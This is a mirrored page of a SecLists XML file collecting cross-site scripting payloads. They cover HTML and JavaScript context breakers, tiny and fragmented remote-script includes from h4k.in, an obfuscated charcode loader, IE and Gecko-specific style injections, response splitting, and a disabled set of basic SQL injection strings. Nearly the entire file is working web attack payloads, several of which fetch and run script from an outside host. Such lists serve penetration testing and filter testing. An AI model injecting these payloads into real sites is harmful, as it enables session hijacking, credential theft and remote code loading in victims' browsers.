mirror of
https://github.com/danielmiessler/SecLists
synced 2026-03-30 10:03:01 +02:00
534 lines
19 KiB
XML
534 lines
19 KiB
XML
<?xml version="1.0"?>
|
|
<!-- from: http://mario.heideri.ch/xss.xml
|
|
date: 03-jan-08
|
|
minor formal modifications
|
|
-->
|
|
<xss>
|
|
<attack>
|
|
<name> --- Reflective XSS Attacks ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Advanced XSS Locator</name>
|
|
<code>';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//</code>
|
|
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Advanced XSS Locator for &lt;title&gt;-Injections</name>
|
|
<code>';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}</code>
|
|
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Breaking XSS 1 (all quotes)</name>
|
|
<code>'';!--"<script>alert(0);</script>=&{(alert(1))}</code>
|
|
<desc>HTML Breaker - tries to break the attribute injected in</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Breaking XSS 2 (double quotes)</name>
|
|
<code>"><script>alert(0);</script></code>
|
|
<desc>HTML Breaker - tries to break the attribute injected in</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Breaking XSS 3 (single quotes)</name>
|
|
<code>'><script>alert(0);</script></code>
|
|
<desc>HTML Breaker - tries to break the attribute injected in</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Breaking XSS 4 (attributes)</name>
|
|
<code>'<script>alert(0);</script></code>
|
|
<desc>HTML Breaker - credits go to Alex</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Semicolon XSS (HTML)</name>
|
|
<code><img src=x onerror=;;alert(1) /></code>
|
|
<desc>HTML Breaker - credits go to Kishor</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Title-breaker</name>
|
|
<code></title><script>alert(1)</script></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML-breaking XSS for backticked attributes</name>
|
|
<code>`> <script>alert(5)</script></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Textarea-breaker (onmouseover)</name>
|
|
<code></textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Noscrript-breaker (onmouseover)</name>
|
|
<code></noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Style-breaker</name>
|
|
<code>}</style><script>a=eval;b=alert;a(b(/i/.source));</script></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- Reflective JS XSS ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>JS Breaking XSS 1</name>
|
|
<code>;}alert(0);{</code>
|
|
<desc>JS Breaker - tries to break the javascript injected in</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>JS Breaking XSS 2 (string concatination)</name>
|
|
<code>"+alert(0)+"</code>
|
|
<desc>JS Breaker - tries to break the javascript injected in</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>onerror XSS Injection</name>
|
|
<code>xyz onerror=alert(6); </code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>onclick XSS Injection</name>
|
|
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Plain JS XSS Injection 1</name>
|
|
<code>a=eval;b=alert;a(b(8));</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Plain JS XSS Injection 2</name>
|
|
<code>a=1;a=eval;b=alert;a(b(11));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>String-breaking JS Injection (single qouted)</name>
|
|
<code>';//%0da=eval;b=alert;a(b(9));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>String-breaking JS Injection (double qouted)</name>
|
|
<code>";//%0da=eval;b=alert;a(b(10));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>String-breaking JS Injection (single qouted)</name>
|
|
<code>'};a=eval;b=alert;a(b(13));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>JSON-breaking JS Injection (double qouted)</name>
|
|
<code>"};a=eval;b=alert;a(b(12));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>JSON-breaking JS Injection (non-qouted)</name>
|
|
<code>1};a=eval;b=alert;a(b(14));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Array-breaking JS Injection (sinlge qouted)</name>
|
|
<code>'];a=eval;b=alert;a(b(15));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Array-breaking JS Injection (double qouted)</name>
|
|
<code>"];a=eval;b=alert;a(b(16));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Array-breaking JS Injection (non qouted)</name>
|
|
<code>1];a=eval;b=alert;a(b(17));//</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Int-breaking JS Injection (non qouted)</name>
|
|
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>CRLF-forced JS Injection</name>
|
|
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>JS Comment breaker</name>
|
|
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- JS Includes ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
|
|
<code><script src=//h4k.in</code>
|
|
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
|
|
<code><script src=http://h4k.in/></code>
|
|
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
|
|
<code><script src=//h4k.in></script></code>
|
|
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Tiny XSS Include 4 (HTML Breaking)</name>
|
|
<code>"><script src=//h4k.in></script><</code>
|
|
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- Fragmented DOM XSS ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Include Fragment Pt. 1</name>
|
|
<code><scri</code>
|
|
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Include Fragment Pt. 2</name>
|
|
<code>pt src=//h4k.in><</code>
|
|
<desc>Second part of a fragmented inclusion attack vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Include Fragment Pt. 3</name>
|
|
<code>></script></code>
|
|
<desc>Third part of a fragmented inclusion attack vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- HTML Injection ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Advanced HTML Injection Locator</name>
|
|
<code><s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e</code>
|
|
<desc>HTML injection vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
|
|
<code>"><script src=http://h4k.in/i.js></script></code>
|
|
<desc>HTML injection vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
|
|
<code>"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script></code>
|
|
<desc>HTML injection vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
|
|
<code>"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script></code>
|
|
<desc>HTML injection vector.</desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<!-- disabled 03-jan-08
|
|
<attack>
|
|
<name> ___ SQL Injections ___x</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>Basic SQL Injection 1</name>
|
|
<code> 1 OR 1 = 1 </code>
|
|
<desc>Very basic SQL Injection vector</desc>
|
|
<label>SQL Injection Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Basic SQL Injection 2</name>
|
|
<code>1' OR '1'='1</code>
|
|
<desc>Another basic SQL Injection vector</desc>
|
|
<label>SQL Injection Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Basic SQL Injection 3</name>
|
|
<code>1\'1</code>
|
|
<desc>Another basic SQL Injection vector</desc>
|
|
<label>SQL Injection Attacks</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Basic SQL Injection 4</name>
|
|
<code>') OR 1 < 2 #</code>
|
|
<desc>Another basic SQL Injection vector</desc>
|
|
<label>SQL Injection Attacks</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
-->
|
|
<attack>
|
|
<name> --- Browser specific attacks ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>IE VBScript injection</name>
|
|
<code>vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))</code>
|
|
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
|
|
<label>Browser specific Attacks</label>
|
|
<browser>IE</browser>
|
|
</attack>
|
|
<attack>
|
|
<name>IE expression injection</name>
|
|
<code>" style="color: expression(alert(0));" a="</code>
|
|
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
|
|
<label>Browser specific Attacks</label>
|
|
<browser>IE</browser>
|
|
</attack>
|
|
<attack>
|
|
<name>IE closing-tag expression injection</name>
|
|
<code></a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser>IE</browser>
|
|
</attack>
|
|
<attack>
|
|
<name>IE backticked semicolon injection</name>
|
|
<code><img src=`x` onrerror= ` ;; alert(1) ` /></code>
|
|
<desc></desc>
|
|
<label>Reflective XSS Attacks</label>
|
|
<browser>IE</browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Mozilla -moz-binding-url injection</name>
|
|
<code>" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="</code>
|
|
<desc>This works in Gecko browsers only.</desc>
|
|
<label>Browser specific Attacks</label>
|
|
<browser>Gecko</browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Mozilla -moz-binding-url injection (filter evading)</name>
|
|
<code>" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="</code>
|
|
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
|
|
<label>Browser specific Attacks</label>
|
|
<browser>Gecko</browser>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- Weird stuff ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>HTTP Reponse Splitting XSS</name>
|
|
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
|
|
<desc>HTTP response splitting vector with XSS alert</desc>
|
|
<label>Weird stuff</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name>Nullbyte XSS</name>
|
|
<code>c%00""<script>alert(0);</script></code>
|
|
<desc></desc>
|
|
<label>Weird stuff</label>
|
|
<browser></browser>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- Style injections and hw/fw-encoding attacks ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}</name>
|
|
<code>BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}</code>
|
|
<desc></desc>
|
|
<label>hw/fw injections</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
|
|
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
|
|
<desc></desc>
|
|
<label>hw/fw injections</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
|
|
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
|
|
<desc></desc>
|
|
<label>hw/fw injections</label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name></name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name> --- URL injection ---</name>
|
|
<code></code>
|
|
<desc></desc>
|
|
<label></label>
|
|
<browser/>
|
|
</attack>
|
|
<attack>
|
|
<name>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</name>
|
|
<code>http://aa<script>alert(123)</script></code>
|
|
<desc></desc>
|
|
<label>URL injection</label>
|
|
<browser/>
|
|
</attack>
|
|
</xss>
|